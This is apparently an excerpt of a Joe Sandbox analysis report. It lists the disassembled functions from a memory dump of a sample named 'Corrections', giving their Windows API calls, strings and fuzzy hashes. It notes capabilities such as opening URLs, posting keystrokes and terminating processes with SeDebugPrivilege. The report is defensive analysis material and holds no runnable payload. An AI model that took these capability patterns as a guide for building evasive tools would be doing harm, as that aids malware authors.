Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 90cbc34c3ef50bab0bfec6d3e3aedc54cf1a698e96195c85cf6d76907794e09b
Instruction ID: 1a3f22055aa9d2fc2dd0062bbe4afeb7bed9c901e85a9ca3c9c8a581f17655f9
Opcode Fuzzy Hash: 90cbc34c3ef50bab0bfec6d3e3aedc54cf1a698e96195c85cf6d76907794e09b
Instruction Fuzzy Hash: 103182F1505308AFEB21AF698D88AAB7FFCEB49754B10452DF446D3240EB34DD049B61

Function 0098A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009655AE,?,?,Bad directive syntax error,009BDCD0,00000000,00000010,?,?), ref: 0098A236
LoadStringW.USER32(00000000,?,009655AE,?), ref: 0098A23D

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0098A301

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 0098A26B
Line %d (File "%s"):, xrefs: 0098A2A7
Line %d:, xrefs: 0098A28C
Error: , xrefs: 0098A2CF
., xrefs: 0098A2E7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 8a841359f7a0e3ec75740ca288005d84636d45222657d2798f785ff05243f4a8
Instruction ID: a45a3dad5c7a810a5082fc0030be13e7842fb5dd01402c5511251ac12baa5845
Opcode Fuzzy Hash: 8a841359f7a0e3ec75740ca288005d84636d45222657d2798f785ff05243f4a8
Instruction Fuzzy Hash: 4B217E3280421EEFDF12BBA0DC06FEE7B79BF58704F044466F515650A2EB71AA18DB11

Function 009829EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009829F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00982A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00982A9A

Strings

largeicons, xrefs: 00982A2E
details, xrefs: 00982A48
SHELLDLL_DefView, xrefs: 00982A19
list, xrefs: 00982A7C
smallicons, xrefs: 00982A62

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: f14be9f1e292e319cc3d0dc743d4131728d739d56ded57a75b5b71c31da2de54
Instruction ID: 3d857857567e27517b95897f7def152d21675ef0907faccfa946ee43050e1549
Opcode Fuzzy Hash: f14be9f1e292e319cc3d0dc743d4131728d739d56ded57a75b5b71c31da2de54
Instruction Fuzzy Hash: A511297664C707B9FA2D7321EC07EAA379C8F54B78B200122F905E41D1FB66AC005B14

Function 00927567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0092758D
GetWindowRect.USER32(?,?), ref: 009275CE
ScreenToClient.USER32(?,?), ref: 009275F6
GetClientRect.USER32(?,?), ref: 0092773A
GetWindowRect.USER32(?,?), ref: 0092775B

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: f9556446bfa3d49902c02895b2eccce6698f58de0c0b8ee5e5038a3b2c7bb182
Instruction ID: 90976f4f1d5506689a3fd8fbeb96c5b7cb32f7582ba4b940bba1ebded8cb7d25
Opcode Fuzzy Hash: f9556446bfa3d49902c02895b2eccce6698f58de0c0b8ee5e5038a3b2c7bb182
Instruction Fuzzy Hash: ACC1583990465AEFDB10CFA8C580BEDFBB5FF08314F14851AE8A5E3254D738A941DBA1

Function 0095D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0095D237
_free.LIBCMT ref: 0095D2A2
_free.LIBCMT ref: 0095D2C8
_free.LIBCMT ref: 0095D2F1
_free.LIBCMT ref: 0095D329
_free.LIBCMT ref: 0095D35A
_free.LIBCMT ref: 0095D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0095D41C
_free.LIBCMT ref: 0095D435

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 30040b3c28a31fb5fc4b21742e548453d1359adf0a9dd4d4da162dea11db41f6
Instruction ID: f7b543514267564283d34292bf36fdc10a8277e458c1b4ff518453915aa06261
Opcode Fuzzy Hash: 30040b3c28a31fb5fc4b21742e548453d1359adf0a9dd4d4da162dea11db41f6
Instruction Fuzzy Hash: D8612671906301AFDB31EF7BD881BBE7BA8AF42326F14056EED54A7281D6319848C791

Function 009B5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 009B5C24
ShowWindow.USER32(?,00000000), ref: 009B5C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 009B5C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 009B5C6F

Part of subcall function 009B79F2: DeleteObject.GDI32(00000000), ref: 009B7A1E

GetWindowLongW.USER32(?,000000F0), ref: 009B5CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B5CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009B5CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 009B5D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 009B5D34

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: a1e0df4fff9f8719b04b1c8ea6843b1d02f17d4eabc1e9c47d7ab6f3d56355bb
Instruction ID: 8a4d3540acf137c59c93a2deb71b7f48749c9d54d55c89a46b3773ab8583683c
Opcode Fuzzy Hash: a1e0df4fff9f8719b04b1c8ea6843b1d02f17d4eabc1e9c47d7ab6f3d56355bb
Instruction Fuzzy Hash: D651D230A51B18BFEF249F24CE4AFD83BAAFB44770F158215F6249A1E1C775A990DB40

Function 009213A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009628D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009628EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009628FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00962912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00962933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00962942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0096295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009211F5,00000000,00000000,00000000,000000FF,00000000), ref: 0096296E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: c2af5e1f3f37eab132473c244089faad8c211db23c311d9971ddf0d22b0d7201
Instruction ID: 435185e902a68dd79e3759b5223b7d9c074ccb8e06977b53a299a1691c326890
Opcode Fuzzy Hash: c2af5e1f3f37eab132473c244089faad8c211db23c311d9971ddf0d22b0d7201
Instruction Fuzzy Hash: 16519C30610609AFDB24DF24DD45BAA7BB9FF98720F204618F946972E0D770E990EB50

Function 0099CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0099CBC7
GetLastError.KERNEL32 ref: 0099CBDA
SetEvent.KERNEL32(?), ref: 0099CBEE

Part of subcall function 0099CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0099CCB7
Part of subcall function 0099CC98: GetLastError.KERNEL32 ref: 0099CD67
Part of subcall function 0099CC98: SetEvent.KERNEL32(?), ref: 0099CD7B
Part of subcall function 0099CC98: InternetCloseHandle.WININET(00000000), ref: 0099CD86

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: e528767d1794be1f88783e8aa351dcd25de3d1b66e0557d7ddb81980114f9400
Instruction ID: a6d92831a49d6760fc2b737c2f1a87f07db4fd3719130edc7d200b3298429c9a
Opcode Fuzzy Hash: e528767d1794be1f88783e8aa351dcd25de3d1b66e0557d7ddb81980114f9400
Instruction Fuzzy Hash: C2318BB1505705AFDF219F69CE84A6ABBE8FF04310B04492DF89A92610EB30E814EB60

Function 00982EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00984393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009843AD
Part of subcall function 00984393: GetCurrentThreadId.KERNEL32 ref: 009843B4
Part of subcall function 00984393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00982F00), ref: 009843BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00982F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00982F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00982F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00982F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00982F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00982F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00982F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00982F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00982F74

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a189bb291281f9bd89aeb2c2e11743f3c3741348ab0d2752a96179b5634b35dd
Instruction ID: 2ef7d888195d5a2b4773a274bbe15bffd092617eb0b95eb0802f0283306a9884
Opcode Fuzzy Hash: a189bb291281f9bd89aeb2c2e11743f3c3741348ab0d2752a96179b5634b35dd
Instruction Fuzzy Hash: B901D470798210BBFB107769DC8EF593F5ADF8EB21F100012F318AE1E0C9E26444DAA9

Function 00982150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00981D95,?,?,00000000), ref: 00982159
HeapAlloc.KERNEL32(00000000,?,00981D95,?,?,00000000), ref: 00982160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00981D95,?,?,00000000), ref: 00982175
GetCurrentProcess.KERNEL32(?,00000000,?,00981D95,?,?,00000000), ref: 0098217D
DuplicateHandle.KERNEL32(00000000,?,00981D95,?,?,00000000), ref: 00982180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00981D95,?,?,00000000), ref: 00982190
GetCurrentProcess.KERNEL32(00981D95,00000000,?,00981D95,?,?,00000000), ref: 00982198
DuplicateHandle.KERNEL32(00000000,?,00981D95,?,?,00000000), ref: 0098219B
CreateThread.KERNEL32(00000000,00000000,009821C1,00000000,00000000,00000000), ref: 009821B5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ca5239c9a2f229ffd115ee253b7d386e85a37abfd2cf3dc87cba614b33f9e079
Instruction ID: 9f53984385414891343b3d441a74047066dd86d8609e2ed19ab0fff43e4139da
Opcode Fuzzy Hash: ca5239c9a2f229ffd115ee253b7d386e85a37abfd2cf3dc87cba614b33f9e079
Instruction Fuzzy Hash: EB01CDB5259304BFE710AFA9DD8DF6B7BACEB88715F004511FA05DB2A1DA709800DB30

Function 009AAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0098DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0098DDAC
Part of subcall function 0098DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0098DDBA
Part of subcall function 0098DD87: CloseHandle.KERNEL32(00000000), ref: 0098DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AABCA
GetLastError.KERNEL32 ref: 009AABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AAC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 009AACC5
GetLastError.KERNEL32(00000000), ref: 009AACD0
CloseHandle.KERNEL32(00000000), ref: 009AAD21

Strings

SeDebugPrivilege, xrefs: 009AABEC

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e15b277493bd52b6e3f624b95abbe3d5cf35107b12d52f95685f2cd06dafa45b
Instruction ID: 21941cb04dcc4a67931da2970fbdb537218679f050d9188e09164d1004b205d6
Opcode Fuzzy Hash: e15b277493bd52b6e3f624b95abbe3d5cf35107b12d52f95685f2cd06dafa45b
Instruction Fuzzy Hash: D561BD70208242AFE310DF14C484F26BBE5AF95318F18849CE4A68BBA3C775EC45CBD2

Function 009B4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009B43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009B43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009B43F0
_wcslen.LIBCMT ref: 009B4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 009B4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009B4490

Strings

SysListView32, xrefs: 009B4393

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 72ed4bc66752334f1817490e1cfeb8c8e459dd1e040b7d028bffeb1c9fa3dd4a
Instruction ID: 57d5f0a86d2213c01951241bdc8a912527e850f4381f6e73c7695ce80a23a15b
Opcode Fuzzy Hash: 72ed4bc66752334f1817490e1cfeb8c8e459dd1e040b7d028bffeb1c9fa3dd4a
Instruction Fuzzy Hash: B741E171A00318ABDF219F64CD49FEA7BE9FF48360F14052AF944E7292D7709890EB90

Function 0098C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0098C6C4
IsMenu.USER32(00000000), ref: 0098C6E4
CreatePopupMenu.USER32 ref: 0098C71A
GetMenuItemCount.USER32(018462D8), ref: 0098C76B
InsertMenuItemW.USER32(018462D8,?,00000001,00000030), ref: 0098C793

Strings

2, xrefs: 0098C6FE
0, xrefs: 0098C66F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 54d37d449d3ba651edb5c7e63f4a95ef8a21cb4307858805bfb67c288879844b
Instruction ID: 925f89f09a8a247fc7d43de4df9adb4be3481db86c3adfae6f202b154f800f4c
Opcode Fuzzy Hash: 54d37d449d3ba651edb5c7e63f4a95ef8a21cb4307858805bfb67c288879844b
Instruction Fuzzy Hash: 3751A0B06002059BDF20EF78D984BAEBBF8EF48314F24466AE911A7391E7749944CF71

Function 0098D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0098D1BE

Strings

stop, xrefs: 0098D18F
warning, xrefs: 0098D1A7
blank, xrefs: 0098D140
info, xrefs: 0098D15F
question, xrefs: 0098D177

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f62ab9484100bbb886228872c7d629ade1a0d887329da9f8cdf8ce948fceb1c3
Instruction ID: 12edab07ab2788d5dfb8ef77aab97d5374de91479b41f4fd49b80fb5ca8b5c69
Opcode Fuzzy Hash: f62ab9484100bbb886228872c7d629ade1a0d887329da9f8cdf8ce948fceb1c3
Instruction Fuzzy Hash: 3711293564E706BEEB096B55DC86EAE77AC9F05764B20002AF900A63C1E7B9AE404761

Function 0098E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0098E759
gethostname.WSOCK32(?,00000100), ref: 0098E773
gethostbyname.WSOCK32(?), ref: 0098E780
inet_ntoa.WSOCK32(?), ref: 0098E7C2
_strcat.LIBCMT ref: 0098E7D0
WSACleanup.WSOCK32 ref: 0098E7F5

Strings

0.0.0.0, xrefs: 0098E79E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 1767b027418cf1d0cf370488ed7afd7769844be46e8f804c72a032d43b29a3ee
Instruction ID: fa870ff6f3a2fb240621fc4f29a21478417b0a6ba6f3cde2d94873f9eb1c1c8d
Opcode Fuzzy Hash: 1767b027418cf1d0cf370488ed7afd7769844be46e8f804c72a032d43b29a3ee
Instruction Fuzzy Hash: 30110372905115BBCB24BB70DD8AFEE77ACEF81721F0001B5F545A6191FF748A819B60

Function 0098F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0098F641
_wcslen.LIBCMT ref: 0098F652
_wcslen.LIBCMT ref: 0098F690
_wcslen.LIBCMT ref: 0098F6C6
_wcslen.LIBCMT ref: 0098F6F6
_wcslen.LIBCMT ref: 0098F706
_wcslen.LIBCMT ref: 0098F742
_wcslen.LIBCMT ref: 0098F771

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: e38dced48efb03ddfba5edcbf1da906dc812767950a66f720cfd4a602a3e7b06
